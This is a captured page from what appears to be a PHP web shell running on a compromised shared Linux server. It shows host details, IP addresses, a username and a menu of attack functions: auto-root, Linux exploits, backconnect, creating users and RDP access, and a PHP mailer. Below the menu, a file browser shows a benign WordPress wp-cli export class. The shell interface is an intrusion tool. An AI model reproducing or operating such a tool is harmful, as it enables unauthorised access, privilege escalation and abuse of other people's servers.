Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
wp-cli /
export-command /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Export_Command.php
14.32
KB
-rw-r--r--
WP_Export_Base_Writer.php
428
B
-rw-r--r--
WP_Export_Exception.php
62
B
-rw-r--r--
WP_Export_File_Writer.php
830
B
-rw-r--r--
WP_Export_Oxymel.php
518
B
-rw-r--r--
WP_Export_Query.php
14.01
KB
-rw-r--r--
WP_Export_Returner.php
1.06
KB
-rw-r--r--
WP_Export_Split_Files_Writer.p...
3.5
KB
-rw-r--r--
WP_Export_Term_Exception.php
67
B
-rw-r--r--
WP_Export_WXR_Formatter.php
9.71
KB
-rw-r--r--
WP_Export_XML_Over_HTTP.php
1.34
KB
-rw-r--r--
WP_Iterator_Exception.php
57
B
-rw-r--r--
WP_Map_Iterator.php
346
B
-rw-r--r--
WP_Post_IDs_Iterator.php
1.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : WP_Export_XML_Over_HTTP.php
<?php class WP_Export_XML_Over_HTTP extends WP_Export_Base_Writer { private $file_name; public function __construct( $formatter, $file_name ) { parent::__construct( $formatter ); $this->file_name = $file_name; } public function export() { try { $export = $this->get_export(); $this->send_headers(); echo $export; } catch ( WP_Export_Exception $e ) { // phpcs:disable WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound -- Possibly used by third party extension. $message = apply_filters( 'export_error_message', $e->getMessage() ); wp_die( $message, __( 'Export Error' ), [ 'back_link' => true ] ); } catch ( WP_Export_Term_Exception $e ) { do_action( 'export_term_orphaned', $this->formatter->export->missing_parents ); $message = apply_filters( 'export_term_error_message', $e->getMessage() ); // phpcs:enable wp_die( $message, __( 'Export Error' ), [ 'back_link' => true ] ); } } protected function write( $xml ) { $this->result .= $xml; } protected function get_export() { $this->result = ''; parent::export(); return $this->result; } protected function send_headers() { header( 'Content-Description: File Transfer' ); header( 'Content-Disposition: attachment; filename=' . $this->file_name ); header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); } }
Close